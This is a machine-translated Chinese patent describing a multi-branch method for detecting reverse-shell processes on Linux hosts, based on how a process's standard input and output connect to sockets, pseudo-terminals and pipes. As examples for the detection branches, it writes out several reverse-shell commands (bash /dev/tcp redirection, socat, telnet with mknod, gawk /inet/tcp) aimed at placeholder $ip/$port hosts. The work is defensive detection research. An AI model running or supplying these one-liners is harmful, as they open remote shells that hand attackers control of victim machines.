CN114722396B

CN114722396B - Method, system and equipment for detecting rebound Shell process

Info

Publication number: CN114722396B
Application number: CN202210536983.5A
Authority: CN
Inventors: 陈靖远; 李昌志; 王宁; 蒋倩; 张嘉欢
Original assignee: Beijing Changting Future Technology Co ltd
Current assignee: Beijing Changting Future Technology Co ltd
Priority date: 2022-05-18
Filing date: 2022-05-18
Publication date: 2022-09-23
Anticipated expiration: 2042-05-18
Also published as: CN114722396A

Abstract

The embodiment of the invention provides a method, a system and equipment for detecting a rebound Shell process, which are used for classifying and detecting the process to be detected after the process to be detected is obtained, so that the common defects of the existing rebound Shell process detection means are overcome, not only is a newly-built process detected, but also the existing process in a host is detected, meanwhile, a plurality of rebound Shell processes which possibly occur are summarized, and the rebound Shell process types are subdivided and detected by combining a plurality of detection modes in due time.

Description

Method, system and equipment for detecting rebound Shell process

Technical Field

The embodiment of the invention relates to the technical field of network security, in particular to a method, a system and equipment for detecting a rebound Shell process.

Background

Shell is a macro-processor that executes commands. Shell can be used in an interactive or non-interactive manner. In the interactive mode, they accept input from the keyboard; when executed in a non-interactive manner, the Shell executes the commands read from the file.

Generally speaking, a rebound Shell process refers to a reverse-connection Shell process, and an attacker monitors a certain TCP/UDP port in an attacker as a server; the victim host actively initiates a request to connect to the server and redirects the standard inputs and outputs of its command line to the server. Hackers can break through firewalls and the like by means of the bounce Shell process to control victim hosts, thus posing a significant threat to host system security.

However, the existing means for detecting the rebound Shell process is too single, the report missing rate is high, an attacker can easily bypass the conventional means, and the protection capability on a host is limited.

Disclosure of Invention

Therefore, the embodiment of the invention provides a method, a system and equipment for detecting a rebound Shell process, and aims to solve the technical problems that the detection means of the rebound Shell process in the prior art is too single, the report missing rate is high, and an attacker is easy to bypass the rebound Shell process.

In order to achieve the above object, the embodiments of the present invention provide the following technical solutions:

according to a first aspect of embodiments of the present invention, an embodiment of the present application provides a method for detecting a resilient Shell process, where the method includes:

acquiring a process to be detected;

classifying the processes to be detected;

respectively detecting whether the process to be detected is a rebound Shell process according to the classification category;

if the process to be detected is a rebound Shell process, judging whether the process to be detected is a repeated rebound Shell process;

if the detected rebound Shell process is a repeated rebound Shell process, filtering the repeated rebound Shell process;

and if the detected rebound Shell process is a non-repeated rebound Shell process, reporting the non-repeated rebound Shell process.

Further, acquiring the process to be detected includes:

scanning an existing process, taking the existing process as a process to be detected, and acquiring related information of the existing process;

monitoring triggering of an OP _ ADD event and an OP _ MOD event in real time, determining that a newly created process occurs when the OP _ MOD event is triggered or the accumulated triggering times of the OP _ ADD event reach four times, taking the newly created process as a process to be detected, and acquiring related information of the newly created process;

wherein the information about the existing process or the newly created process comprises: process name, process execution path, complete command to execute the process, process start time, process ID, parent process ID, process user information, parent process user information, and process standard input, output information.

Further, classifying the processes to be detected includes:

dividing the process to be detected into an interactive Shell process and a non-interactive Shell process;

when the process to be detected is an interactive Shell process, dividing the interactive Shell process into a first interactive Shell process, a second interactive Shell process, a third interactive Shell process and a fourth interactive Shell process according to the process standard input and output information;

the standard input and output of a first interactive Shell process are both network connection objects, the standard input and output of a second interactive Shell process are both character devices, the standard input of a third interactive Shell process is a pipeline connection object, and the standard input and output of a fourth interactive Shell process are conditions except for the first interactive Shell process, the second interactive Shell process and the third interactive Shell process.

Further, dividing the process to be detected into an interactive Shell process and a non-interactive Shell process, including:

judging whether the process execution path of the process to be detected can be matched with a first preset regular expression or not;

if the process execution path of the process to be detected cannot be matched with a first preset regular expression, the process to be detected is a non-interactive Shell process;

if the process execution path of the process to be detected can be matched with a first preset regular expression, judging whether the execution parameters of the process to be detected have "-c";

if the execution parameter of the process to be detected has "-c", the process to be detected is a non-interactive Shell process;

if the execution parameters of the process to be detected do not have "-c", judging whether the execution parameters of the process to be detected have parameters ending with ". sh";

if the execution parameters of the process to be detected comprise parameters ending with the 'sh', the process to be detected is a non-interactive Shell process;

if the execution parameters of the process to be detected do not have the parameters ending with the ". sh", judging whether the process execution path of the parameters not beginning with the "-" of the process to be detected is a disk file path or not;

if the process execution path of the parameter which does not start with the negative is the disk file path, the process to be detected is a non-interactive Shell process;

and if the process execution path of the parameter which does not start with the < - > is not the disk file path, the process to be detected is the interactive Shell process.

Further, respectively detecting whether the process to be detected is a rebound Shell process according to the classification category, including:

if the interactive Shell process is the first interactive Shell process, judging whether the network connection object is realized through a local socket;

if the network connection object is realized through a local socket, judging whether the parent process of the process to be detected has one and only one effective network connection object;

if the parent process of the process to be detected has one and only one effective network connection object, the process to be detected is a rebound Shell process, otherwise, the process to be detected is not the rebound Shell process;

if the network connection object is not realized through a local socket, judging whether the standard input and output of the process to be detected are the same effective network connection object;

and if the standard input and output of the process to be detected are the same effective network connection object, the process to be detected is a rebound Shell process, otherwise, the process to be detected is not the rebound Shell process.

Further, respectively detecting whether the process to be detected is a rebound Shell process according to the classification category, and the method further comprises the following steps:

if the interactive Shell process is a second interactive Shell process, judging whether the standard input and output of the process to be detected are the same character equipment or not, and whether the character equipment is a slave pseudo terminal or not;

if the standard input and output of the process to be detected are the same character device and the character device is a slave pseudo terminal, judging whether a parent process of the process to be detected has an effective network connection object or not, otherwise, judging that the process to be detected is not a rebound Shell process;

if the parent process of the process to be detected has one and only one effective network connection object, judging whether a main pseudo terminal file descriptor exists in the first 20 file descriptors of the parent process of the process to be detected;

and if the primary pseudo terminal file descriptors exist in the first 20 file descriptors of the parent process of the process to be detected, judging that the process to be detected is a rebound Shell process, otherwise, judging that the process to be detected is not the rebound Shell process.

if the interactive Shell process is a third interactive Shell process, judging whether the process to be detected meets special judgment conditions; wherein the special judgment condition is as follows: the parent process of the process to be detected has at least two child processes; the process of the opposite end of the standard input pipeline of the process to be detected is another sub-process of the parent process, and is a cat process, a tee process or a less process; the cat process, the tee process or the less process and the process to be detected only have one network connection object and are the same effective network connection object;

if the process to be detected meets a special judgment condition, directly judging that the process to be detected is a rebound Shell process;

if the process to be detected does not meet the special judgment condition, judging whether the standard output of the process to be detected is a pipeline connection object or not;

if the standard output of the process to be detected is not a pipeline connection object, the process to be detected is not a rebound Shell process;

if the standard output of the process to be detected is a pipeline connection object, judging whether the number of the child processes of the parent process of the process to be detected is more than 1;

if the number of the child processes of the parent process of the process to be detected is not more than 1, judging whether the parent process of the process to be detected has one and only one effective network connection object; if the parent process of the process to be detected has one and only one effective network connection object, judging whether a pipeline connection file descriptor communicated with a child process exists in the first 20 file descriptors of the parent process of the process to be detected, otherwise, judging that the process to be detected is not a rebound Shell process; if the pipeline connection file descriptor communicated with the child process exists in the first 20 file descriptors of the parent process of the process to be detected, judging that the process to be detected is a rebound Shell process, otherwise, judging that the process to be detected is not the rebound Shell process;

if the number of the child processes of the parent process of the process to be detected is more than 1, judging whether the standard output or the extended input of the child process exists in the process to be detected, and redirecting the output to the standard input and the standard output of the process to be detected;

if the standard output or the extended input and the output of the sub-process do not exist in the process to be detected, redirecting to the standard input and the standard output of the process to be detected, the process to be detected is not a rebound Shell process;

if the standard output or the extended input or the output of the sub-process exists in the process to be detected and is redirected to the standard input of the process to be detected, marking the sub-process of the process to be detected as a sub-process p1 and acquiring a network connection object s1 of the sub-process p 1; if the standard output or the extended input and output of the sub-process of the process to be detected is redirected to the standard output of the process to be detected, marking the sub-process of the process to be detected as a sub-process p2, and acquiring a network connection object s2 of the sub-process p 2;

judging whether the network connection object s1 and the network connection object s2 are empty;

if the network connection object s1 and the network connection object s2 are both empty, the process to be detected is not a rebound Shell process;

if the network connection object s1 is empty and the network connection object s2 is not empty, let s1 equal s 2; if the network connection object s2 is empty and the network connection object s1 is not empty, let s2 equal s 1; if neither the network connection object s1 nor the network connection object s2 is empty, s1, s2 remain unchanged;

judging whether the network connection object s1 and the network connection object s2 are valid network connection objects or not;

if the network connection object s1 and the network connection object s2 are both valid network connection objects, judging whether the opposite end IP addresses of the network connection object s1 and the network connection object s2 are the same, otherwise, judging that the process to be detected is not a rebound Shell process;

if the IP addresses of the opposite ends of the network connection object s1 and the network connection object s2 are the same, the process to be detected is a rebound Shell process, otherwise, the process to be detected is not a rebound Shell process.

if the interactive Shell process is a fourth interactive Shell process or the process to be detected is a non-interactive Shell process, judging whether a process command of the process to be detected can be matched with a second preset regular expression; the second preset regular expression comprises a key regular part and a value regular part;

if the process command of the process to be detected can be matched with a second preset regular expression, judging whether the process to be detected has one and only one effective network connection object, otherwise, the process to be detected is not a rebound Shell process;

if the process to be detected has one and only one effective network connection object, judging whether the effective network connection object is generated by a fork function;

and if the effective network connection object is generated by a fork function, the process to be detected is a rebound Shell process, otherwise, the process to be detected is not the rebound Shell process.

According to a second aspect of the embodiments of the present invention, an embodiment of the present application provides a system for detecting a resilient Shell process, the system including:

the acquisition module is used for acquiring a process to be detected;

the classification module is used for classifying the processes to be detected;

the detection module is used for respectively detecting whether the process to be detected is a rebound Shell process according to the classification category;

the feedback module is used for judging whether the process to be detected is a rebound Shell process or not if the process to be detected is the rebound Shell process; if the detected rebound Shell process is a repeated rebound Shell process, filtering the repeated rebound Shell process; and if the detected rebound Shell process is a non-repeated rebound Shell process, reporting the non-repeated rebound Shell process.

Further, acquiring the process to be detected includes:

monitoring triggering of an OP _ ADD event and an OP _ MOD event in real time, determining that a newly created process occurs when the OP _ ADD event is triggered or the accumulated triggering times of the OP _ ADD event reach four times, taking the newly created process as a process to be detected, and acquiring related information of the newly created process;

wherein the information related to the existing process or the newly created process comprises: process name, process execution path, complete command to execute the process, process start time, process ID, parent process ID, process user information, parent process user information, and process standard input, output information.

Further, classifying the processes to be detected includes:

if the execution parameters of the process to be detected do not have "-c", judging whether the execution parameters of the process to be detected have a parameter ending with ". sh";

if the process execution path of the parameter which does not start with the-of the process to be detected is a disk file path, the process to be detected is a non-interactive Shell process;

if the standard input and output of the process to be detected is the same character device and the character device is a slave pseudo terminal, judging whether a parent process of the process to be detected has an effective network connection object or not, otherwise, the process to be detected is not a rebound Shell process;

Further, respectively detecting whether the process to be detected is a rebound Shell process according to the classification category, and further comprising:

if the interactive Shell process is a second interactive Shell process, judging whether the standard input and output of the process to be detected is the same character equipment or not, and whether the character equipment is a slave pseudo terminal or not;

if the interactive Shell process is a third interactive Shell process, judging whether the process to be detected meets special judgment conditions; wherein the special judgment condition is as follows: the parent process of the process to be detected has at least two child processes; the process of the opposite end of the standard input pipeline of the process to be detected is another sub-process of the parent process and is a cat process, a tee process or a less process; the cat process, the tee process or the less process and the process to be detected only have one network connection object and are the same effective network connection object;

if the standard output or the extended input of the subprocess exists in the process to be detected, redirecting the output to the standard input of the process to be detected, marking the subprocess to be detected as a subprocess p1, and acquiring a network connection object s1 of the subprocess p 1; if the standard output or the extended input and output of the sub-process of the process to be detected is redirected to the standard output of the process to be detected, marking the sub-process of the process to be detected as a sub-process p2, and acquiring a network connection object s2 of the sub-process p 2;

According to a third aspect of embodiments of the present invention, there is provided an apparatus for detecting a bouncing Shell process, the apparatus including: a processor and a memory;

the memory is to store one or more program instructions;

the processor is configured to execute one or more program instructions to perform the steps of a method of detecting a bouncing Shell process as described in any one of the above.

Compared with the prior art, the method, the system and the equipment for detecting the rebound Shell process have the advantages that after the process to be detected is obtained, the process to be detected is classified and detected, the common defects of the existing rebound Shell process detection means are overcome, not only is the newly-built process detected, but also the existing process in the host is detected, meanwhile, various rebound Shell processes which possibly occur are summarized, and the rebound Shell process types are subdivided and detected by combining various detection modes in due time.

Drawings

In order to more clearly illustrate the embodiments of the present invention or the technical solutions in the prior art, the drawings used in the description of the embodiments or the prior art will be briefly described below. It should be apparent that the drawings in the following description are merely exemplary, and that other embodiments can be derived from the drawings provided by those of ordinary skill in the art without inventive effort.

The structures, ratios, sizes, and the like shown in the present specification are only used for matching with the contents disclosed in the specification, so as to be understood and read by those skilled in the art, and are not used to limit the conditions that the present invention can be implemented, so that the present invention has no technical significance, and any structural modifications, changes in the ratio relationship, or adjustments of the sizes, without affecting the effects and the achievable by the present invention, should still fall within the range that the technical contents disclosed in the present invention can cover.

Fig. 1 is a schematic structural diagram of a system for detecting a resilient Shell process according to an embodiment of the present invention;

fig. 2 is a schematic flowchart of a method for detecting a resilient Shell process according to an embodiment of the present invention;

fig. 3 is a logic diagram of a method for detecting a resilient Shell process according to an embodiment of the present invention;

fig. 4 is a schematic flowchart of a process to be detected divided into an interactive Shell process and a non-interactive Shell process according to an embodiment of the present invention;

fig. 5 is a schematic flowchart of a method for detecting a resilient Shell process when the interactive Shell process is the first interactive Shell process according to the embodiment of the present invention;

fig. 6 is a schematic flowchart of a method for detecting a resilient Shell process when the interactive Shell process is a second interactive Shell process according to an embodiment of the present invention;

fig. 7 is a schematic flowchart of a method for detecting a bounce-back Shell process when the interactive Shell process is a third interactive Shell process according to the embodiment of the present invention;

fig. 8 is a flowchart illustrating a method for detecting a resilient Shell process when the interactive Shell process is a fourth interactive Shell process or the process to be detected is a non-interactive Shell process according to the embodiment of the present invention.

Detailed Description

The present invention is described in terms of specific embodiments, and other advantages and benefits of the present invention will become apparent to those skilled in the art from the following disclosure. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present invention.

The defects of the existing rebound Shell process detection are shown in the following aspects:

(1) only newly created processes are detected, and the existing processes are not detected;

(2) monitoring and detecting only the default Shell-Bash process, and lacking the detection of Shell processes such as zsh, dash, csh and the like;

(3) the detection of non-interactive rebound Shell processes, such as the rebound Shell process generated by using an interpreter such as Python, Perl and the like, is lacked;

(4) the detection of the rebound Shell process when the standard input and output of the process to be detected are character devices is lacked;

(5) when the judgment is carried out by means of the network connection condition of the process to be detected, the network connection condition of the parent process of the current process is ignored.

The purpose of this application lies in: and timely combining various detection modes to carry out subdivision detection on the rebound Shell process type, and providing the rebound Shell process detection which is more perfect, higher in accuracy rate and lower in missing report rate compared with the prior art.

In order to solve the above technical problem, as shown in fig. 1, an embodiment of the present application provides a system for detecting a resilient Shell process, which specifically includes: the device comprises an acquisition module 1, a classification module 2, a detection module 3 and a feedback module 4.

Further, the obtaining module 1 is configured to obtain a process to be detected; the classification module 2 is used for classifying the processes to be detected; the detection module 3 is used for respectively detecting whether the process to be detected is a rebound Shell process according to the classification category; the feedback module 4 is used for judging whether the process to be detected is a rebound Shell process or not if the process to be detected is the rebound Shell process; if the detected rebound Shell process is a repeated rebound Shell process, filtering the repeated rebound Shell process; and if the detected rebound Shell process is a non-repeated rebound Shell process, reporting the non-repeated rebound Shell process.

Compared with the prior art, the system for detecting the rebound Shell process has the advantages that after the process to be detected is obtained, the process to be detected is classified and detected, common defects of existing rebound Shell process detection means are overcome, not only is the newly-built process detected, but also the existing process in the host is detected, meanwhile, various rebound Shell processes which possibly occur are summarized, various detection modes are timely combined, the rebound Shell process types are subdivided and detected, compared with an existing detection method, the system for detecting the rebound Shell process is more perfect, higher in accuracy rate and lower in report missing rate, and the safety of the host can be better guaranteed.

Corresponding to the system for detecting the rebound Shell process, the embodiment of the invention also discloses a method for detecting the rebound Shell process. A method for detecting a resilient Shell process disclosed in the embodiments of the present invention is described in detail below with reference to the above-described system for detecting a resilient Shell process.

In an embodiment of the present invention, as shown in fig. 2, specific steps of a method for detecting a bouncing Shell process provided in an embodiment of the present application are described in detail below.

Step S11: the process to be detected is acquired by the acquisition module 1. The acquired process to be detected comprises the following steps: an already created process and a newly created process.

In an embodiment of the present invention, the created processes may be obtained by scanning. Further, the acquiring the process to be detected specifically includes: scanning the existing process, taking the existing process as a process to be detected, and acquiring related information of the existing process. The existing process is a created process, and the related information of the existing process includes: process name (exename), process execution path (exepath), complete command to execute the process (cmdline), process start time (start _ time), process id (pid), parent process id (ppid), process user information, parent process user information, and process standard input, output information, etc.

In addition, the newly created process may be acquired through real-time monitoring. Further, the acquired process to be detected further includes: monitoring triggering of an OP _ ADD event and an OP _ MOD event in real time, determining that a newly created process occurs when the OP _ MOD event is triggered or the accumulated triggering times of the OP _ ADD event reaches four times, taking the newly created process as a process to be detected, and acquiring related information of the newly created process.

The above-mentioned OP _ ADD event and OP _ MOD event are defined in advance for monitoring whether the Shell in the kernel module executes the fork function and the execute function, the OP _ ADD event corresponds to monitoring the execution of the fork function, and the OP _ MOD event corresponds to monitoring the execution of the execute function.

It should be noted that, when the Shell (such as the Bash) executes a command, it generally executes a fork function on itself, and at this time, an OP _ ADD event monitored by the process is triggered, and at this time, the PID is a PID of a new process, and the escape is a process execution path of the Bash process itself. For Bash, a script uses "/bin/Bash" to explain execution, then execute function executes a command, and at this time, an OP _ MOD event monitored by a process is triggered, the PID of the OP _ MOD event is the same as that of the OP _ ADD event, and the execute is set as the execution path of the executed command. Therefore, embodiments of the present invention generally need to monitor the OP _ MOD event.

However, when the Bash command is executed in Bash (without adding the-i parameter), only the fork function execution is performed, and the execute function is not required to be executed. Therefore, only the OP _ ADD event execution is triggered in the above case, and the OP _ MOD event execution is not triggered. The essence is that the escape (and other parameters) of the two processes before and after the fork function is executed are the same, so the execute function is not executed.

In summary, the embodiment of the present invention provides a process cache to handle the above situation. And after receiving the triggering of the OP _ ADD event, adding the process PID into the process cache, and after receiving the triggering of the OP _ MOD event, deleting the corresponding process PID from the process cache. Thus, each time an OP _ ADD event is received and triggered, the count of all processes in the process cache is incremented by 1 (an initial value of 0). And if the count of a certain process in the process cache is greater than or equal to 4, determining that the process does not have a corresponding OP _ MOD event to be triggered, and detecting the process. If no process is generated after a process which only triggers the OP _ ADD event but not the OP _ MOD event is generated, the process cannot be detected because the process count in the process cache is not increased at this time. The command is usually executed after the resilient Shell process succeeds, and at this time, the detection mechanism in the embodiment of the present invention is triggered as long as several commands are executed.

Likewise, the information about the newly created process includes: the process comprises a process name (exename), a process execution path (exepath), a complete command (cmdlene) for executing a process, a process start time (start _ time), a process ID (pid), a parent process ID (ppid), process user information, parent process user information, and process standard input and output information.

Step S12: the process to be detected is classified by the classification module 2.

The step S12 specifically includes: and dividing the process to be detected into an interactive Shell process and a non-interactive Shell process.

Further, referring to fig. 4, dividing the process to be detected into an interactive Shell process and a non-interactive Shell process includes: judging whether a process execution path (escape) of a process to be detected can be matched with a first preset regular expression or not

Matching; if the process execution path of the process to be detected cannot be matched with the first preset regular expression, the process to be detected is a non-interactive Shell process; if the process execution path of the process to be detected can be matched with the first preset regular expression, judging whether the execution parameters of the process to be detected have "-c"; if the execution parameter of the process to be detected has "-c", the process to be detected is a non-interactive Shell process; if the execution parameters of the process to be detected do not have "-c", judging whether the execution parameters of the process to be detected have parameters ending with ". sh"; if the execution parameters of the process to be detected comprise parameters ending with the 'sh', the process to be detected is a non-interactive Shell process; if the execution of the process to be detectedIf the row parameters do not have parameters ending with the mark sh, judging whether the process execution path of the parameters which do not start with the mark of the process to be detected is a disk file path; if the process execution path of the parameter which does not start with the-of the process to be detected is the disk file path, the process to be detected is a non-interactive Shell process; and if the process execution path of the parameter which does not start with the < - > is not the disk file path, the process to be detected is the interactive Shell process.

Further, step S12 includes: and when the process to be detected is the interactive Shell process, dividing the interactive Shell process into a first interactive Shell process, a second interactive Shell process, a third interactive Shell process and a fourth interactive Shell process according to the process standard input and output information.

Further, the standard input and output of the first interactive Shell process are both network connection objects, the standard input and output of the second interactive Shell process are both character devices, the standard input of the third interactive Shell process is a pipeline connection object, the standard input and output of the fourth interactive Shell process are conditions except for the first interactive Shell process, the second interactive Shell process and the third interactive Shell process, that is, the standard input and output of the process to be detected do not belong to any one of the above categories, for example, the standard input of the process to be detected is a network connection object and the standard output is a pipeline connection object; or preliminarily judging that the process to be detected is not the rebound Shell process in the detection of the three first interactive Shell processes, the second interactive Shell process and the third interactive Shell process.

Step S13: and respectively detecting whether the process to be detected is a rebound Shell process or not through a detection module 3 according to the classification category.

In summary, in the embodiment of the present invention, the acquired process to be detected is firstly divided into the interactive Shell process and the non-interactive Shell process, and then the interactive Shell process is divided into the first interactive Shell process, the second interactive Shell process, the third interactive Shell process and the fourth interactive Shell process according to the specific process standard input and output types. Referring to fig. 3, for the above five types of processes to be detected, in the embodiment of the present invention, four types of resilient Shell process detection logics are provided, which are a first detection logic, a second detection logic, a third detection logic, and a fourth detection logic, respectively, where the first detection logic, the second detection logic, the third detection logic, and the fourth detection logic correspond to the first interactive Shell process, the second interactive Shell process, the third interactive Shell process, and the fourth interactive Shell process, respectively, and the non-interactive Shell process and the fourth interactive Shell process have the same detection logic, and both of them can be detected by the fourth detection logic. The classification and detection logic preferably adopts the following scheme in time sequence: firstly, dividing the process to be detected into an interactive Shell process and a non-interactive Shell process, and directly adopting a fourth detection logic for the non-interactive Shell process. For the interactive Shell process, whether the process to be detected is the first interactive Shell process or not can be preferentially identified, and if the process to be detected is the first interactive Shell process, the first detection logic is used. If the process to be detected is the interactive Shell process but the process to be detected is not the first interactive Shell process, identifying whether the process to be detected is the second interactive Shell process or the third interactive Shell process; and if the process to be detected is a second interactive Shell process, using a second detection logic, and if the process to be detected is a third interactive Shell process, using a third detection logic. And if the process to be detected is the interactive Shell process but the process to be detected is not the first interactive Shell process, the second interactive Shell process or the third interactive Shell process, determining the process to be detected as a fourth interactive Shell process and using fourth detection logic. In addition, when the first detection logic, the second detection logic or the third detection logic is used for detection, and the process to be detected is not the rebound Shell process, the fourth detection logic is also used for detection.

Specifically, referring to fig. 5, when the interactive Shell process is the first interactive Shell process, the detecting whether the process to be detected is the bounce Shell process, that is, the first detecting logic, specifically includes the following steps: and if the interactive Shell process is the first interactive Shell process, judging whether the network connection object is realized through the local socket. If the network connection object is realized through a local socket, judging whether a parent process of the process to be detected has one and only one effective network connection object; if the parent process of the process to be detected has only one effective network connection object, the process to be detected is an rebounding Shell process, for example, a process generated by a Shell command of 'bash-i > &/dev/tcp/$ ip/$ port 0> & 1', otherwise, if the parent process of the process to be detected has at least two effective network connection objects, the process to be detected is not the rebounding Shell process. If the network connection object is not realized through the local socket, judging whether the standard input and output of the process to be detected are the same effective network connection object; if the standard input and output of the process to be detected are the same effective network connection object, the process to be detected is a rebound Shell process, for example, a process generated by a command of socatexec, bash, stderr, siginttcp: $ ip: $ port, otherwise, if the standard input and output of the process to be detected are not the same effective network connection object, the process to be detected is not the rebound Shell process.

It should be noted that, in the embodiment of the present application, the valid network connection object is defined as follows:

the local port range is in the range defined by "/proc/sys/net/ipv 4/ip _ local _ port _ range", and if the file is not available, the local port range is in the range of [10000, 65535 ];

the IP of the opposite end is not '0.0.0.0' or ':';

the opposite end IP is not one of the local IP;

the local Server is a Client (controlled object) to which the network is connected, and is not a Server (implementation controller).

If the above four conditions are satisfied, the network connection object is referred to as an effective network connection object (i.e. a network connection object that conforms to the connection characteristics of the conventional resilient Shell process) in the embodiment of the present application.

Referring to fig. 6, when the interactive Shell process is the second interactive Shell process, the detecting whether the process to be detected is the bounce Shell process, that is, the second detecting logic, specifically includes the following steps: and if the interactive Shell process is the second interactive Shell process, judging whether the standard input and output of the process to be detected is the same character equipment or not, and whether the character equipment is a slave pseudo terminal (slave) or not. If the standard input and output of the process to be detected is the same character device and the character device is a slave pseudo terminal (slave), judging whether a parent process of the process to be detected has an effective network connection object, otherwise, if the standard input and output of the process to be detected is not the same character device or the standard input and output of the process to be detected is the same character device, the character device is not the slave pseudo terminal (slave) and the process to be detected is not the rebound Shell process. If the parent process of the process to be detected has only one effective network connection object, judging whether a main pseudo terminal file descriptor exists in the first 20 file descriptors of the parent process of the process to be detected, otherwise, if the parent process of the process to be detected does not satisfy and only has one effective network connection object, the process to be detected is not a rebound Shell process. If the main pseudo terminal file descriptors exist in the first 20 file descriptors of the parent process of the process to be detected, the process to be detected is judged to be a rebound Shell process, for example, the process generated by a command of 'socatexec:' bash-li ', pty, stderr, setsid, sigint, sanetcp: $ ip: $ port', otherwise, if the main pseudo terminal file descriptors do not exist in the first 20 file descriptors of the parent process of the process to be detected, the process to be detected is not the rebound Shell process.

Referring to fig. 7, when the interactive Shell process is the third interactive Shell process, the detecting whether the process to be detected is the bounce Shell process, that is, the third detecting logic, specifically includes the following steps: if the interactive Shell process is the third interactive Shell process, judging whether the process to be detected meets special judgment conditions; if the process to be detected meets the special judgment condition, the process to be detected is directly judged to be a rebound Shell process, for example, a process generated by Shell commands of ' exec 5< >/dev/tcp/$ ip/$ port ', less < &5 | while read line, do $ line 1> & 52 > &1 and done '.

Wherein, the special judgment conditions are as follows: the parent process of the process to be detected has at least two child processes; the process of the opposite end of the process standard input pipeline to be detected is another sub-process of the parent process and is a cat process, a tee process or a less process; the cat process, the tee process or the less process and the process to be detected only have one network connection object and are the same effective network connection object.

If the process to be detected does not meet the special judgment condition, judging whether the standard output of the process to be detected is a pipeline connection object; and if the standard output of the process to be detected is not the pipeline connection object, the process to be detected is not the rebound Shell process. If the standard output of the process to be detected is a pipeline connection object, judging whether the number of the child processes of the parent process of the process to be detected is more than 1; if the number of the child processes of the parent process of the process to be detected is not more than 1, judging whether the parent process of the process to be detected has one and only one effective network connection object; if the parent process of the process to be detected has only one effective network connection object, judging whether a pipeline connection file descriptor communicated with the child process exists in the first 20 file descriptors (fd) of the parent process of the process to be detected, otherwise, if the parent process of the process to be detected does not satisfy the existence and only has one effective network connection object, the process to be detected is not a rebound Shell process; if the pipeline connection file descriptor communicated with the child process exists in the first 20 file descriptors (fd) of the parent process of the process to be detected, the process to be detected is judged to be a rebound Shell process, for example, the Shell command' echo-e

"procedure of generation. Otherwise, if the pipeline connection file descriptor communicated with the child process does not exist in the first 20 file descriptors (fd) of the parent process of the process to be detected, the process to be detected is not the rebound Shell process.

If the number of the child processes of the parent process of the process to be detected is more than 1, judging whether the process to be detected has the standard output or the extended input and output (fd = 3) of the child process and is redirected to the standard input and the standard output of the process to be detected; and if the standard output or the extended input and the output (fd = 3) of the sub-process do not exist in the process to be detected, redirecting the standard input and the standard output of the process to be detected, wherein the process to be detected is not the rebound Shell process. If the standard output or the extended input and output (fd = 3) of the sub-process exists in the process to be detected and is redirected to the standard input of the process to be detected, the sub-process of the process to be detected is marked as a sub-process p1, and a network connection object s1 of the sub-process p1 is obtained. If the standard output or the extended input and output (fd = 3) of the sub-process exists in the process to be detected and is redirected to the standard output of the process to be detected, the sub-process of the process to be detected is marked as a sub-process p2, and a network connection object s2 of the sub-process p2 is obtained.

Judging whether the network connection object s1 and the network connection object s2 are empty or not; and if the network connection object s1 and the network connection object s2 are both empty, the process to be detected is not the rebound Shell process. If the network connection object s1 is empty and the network connection object s2 is not empty, let s1 equal s 2; if the network connection object s2 is empty and the network connection object s1 is not empty, let s2 equal s 1; if neither the network connection object s1 nor the network connection object s2 is empty, s1 and s2 remain unchanged.

Judging whether the network connection object s1 and the network connection object s2 are valid network connection objects or not; if the network connection object s1 and the network connection object s2 are both valid network connection objects, judging whether the opposite IP addresses of the network connection object s1 and the network connection object s2 are the same, otherwise, if the network connection object s1 or the network connection object s2 is not a valid network connection object, the process to be detected is not a rebound Shell process. If the peer IP addresses of the network connection object s1 and the network connection object s2 are the same, the process to be detected is a bounce Shell process, for example, a process generated by Shell commands "mknd/tmp/. a p, telnet $ IP port 0</tmp/. a | &/bin/bash-i > &/tmp/. a, rm-f/tmp/. a" when the peer IPs (p 1, p 2) of the network connection object s1 and the network connection object s2 are the same process. Otherwise, if the peer IP addresses of the network connection object s1 and the network connection object s2 are different, the process to be detected is not a bounce Shell process, for example, a process generated by the Shell command "telnet $ IP $ port1 | &/bin/bash | & telnet $ IP $ port 2" when the peer IPs (p 1, p 2) of the network connection object s1 and the network connection object s2 are not the same process.

Referring to fig. 8, when the interactive Shell process is the fourth interactive Shell process, the detecting whether the process to be detected is the bounce Shell process, that is, the fourth detection logic specifically includes the following steps: and if the interactive Shell process is the fourth interactive Shell process, judging whether the process command of the process to be detected can be matched with the second preset regular expression.

The second preset regular expression is a detection rule predefined based on regular, the second preset regular expression comprises a key regular part and a value regular part, the key regular part is regular of an interpreter, and the value regular part is regular of parameters, and the method is specifically as follows:

specifically, the process execution path (exapath) of the process matches the keyed regular portion, e.g., the process execution path (exapath) may match to ". to/perl [ \ \ d \ \. ] $. The command to execute the process (cmdlene [ i ], 1< i ≦ length of cmdlene) is in regular part of the value, e.g., the command to execute the process may match to "socket. If the key regular part and the value regular part are matched at the same time, it is considered that the predefined regular rule (second preset regular expression) can be matched with the process command of the process to be detected.

And if the process command of the process to be detected can be matched with the second preset regular expression, judging whether the process to be detected has one and only one effective network connection object, otherwise, if the process command of the process to be detected can not be matched with the second preset regular expression, judging that the process to be detected is not a rebound Shell process. If the process to be detected has and only has one effective network connection object, judging whether the effective network connection object is generated by a fork function, otherwise, if the process to be detected does not satisfy and only has one effective network connection object, the process to be detected is not a rebound Shell process. If the effective network connection object is generated by a fork function, the process to be detected is a rebound Shell process, for example, a process generated by executing "gawk 'BEGIN { s ="/inet/tcp/0/' $ { ip } '/' $ { port } '", while (42) { do { printf" Shell > "| s, s | & gtgitline c, if (c) { while ((c | & gtgitline) > 0) print $0 | s, close (c); } while (c | =" exit ") close(s); }'/dev/null". Otherwise, if the valid network connection object is not generated by the fork function, the process to be detected is not a rebound Shell process.

Referring to fig. 8, when the process to be detected is a non-interactive Shell process, the method for detecting whether the process to be detected is a bounce Shell process is the same as the method for detecting when the interactive Shell process is a fourth interactive Shell process, and specifically includes the following steps: and if the interactive Shell process is the fourth interactive Shell process, judging whether the process command of the process to be detected can be matched with the second preset regular expression.

specifically, the process execution path (exepath) of the process matches the regular portion of the key, e.g., the process execution path (exepath) may match to ". to/perl [ \ \ d \ \. ] $". The command to execute the process (cmdlene [ i ], 1< i ≦ length of cmdlene) is in regular part of the value, e.g., the command to execute the process may match to "socket. If the key regular part and the value regular part are matched at the same time, it is considered that the predefined regular rule (second preset regular expression) can be matched with the process command of the process to be detected.

